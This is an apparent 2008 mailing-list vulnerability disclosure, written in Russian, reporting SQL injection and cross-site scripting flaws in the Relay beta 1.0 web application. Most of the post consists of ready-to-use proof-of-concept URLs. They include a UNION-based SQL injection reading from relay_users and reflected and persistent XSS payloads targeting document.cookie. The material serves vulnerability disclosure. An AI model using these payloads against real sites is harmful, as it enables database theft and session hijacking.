Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Security Advisory for Bugzilla 3.0.3, 3.1.3, 2.22.3, and 2.20.5

[ GLSA 200805-02 ] phpMyAdmin: Information disclosure

QTOFileManager V 1.0<== Remote File Upload Vulnerability

Power Editor LOCAL FILE INCLUSION Vulnerbility

From:	MustLive <mustlive_(at)_websecurity.com.ua>
Date:	06.05.2008
Subject:	SQL Injection and Cross-Site Scripting vulnerabilities in Relay

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною новых SQL Injection и Cross-Site Scripting уязвимостях в движке Relay.

SQL Injection:

http://site/relay/management/index.
php?page=manage&module=users&action=setEmail&uid=1%20and%20su
bstring(version(),1,1)=3&email=1

XSS:

http://site/relay/relay.
php?relay=getFile&fileid=1%20union%20select%201,1,1,1,1,1,1,1,1,
1,1,1,1,1%20from%20relay_users/*%3Cscript%3Ealert(document.
cookie)%3C/script%3E

XSS:

http://site/relay/management/index.
php?page=manage&module=users&action=setEmail&uid=and%3Cscript%
3Ealert(document.cookie)%3C/script%3E&email=1

XSS (Persistent):

http://site/relay/management/index.
php?page=manage&module=users&action=setEmail&uid=1&email=%3Cs
cript%3Ealert(document.cookie)%3C/script%3E

Уязвима версия Relay beta 1.0 (и предыдущие версии).

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/2075/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua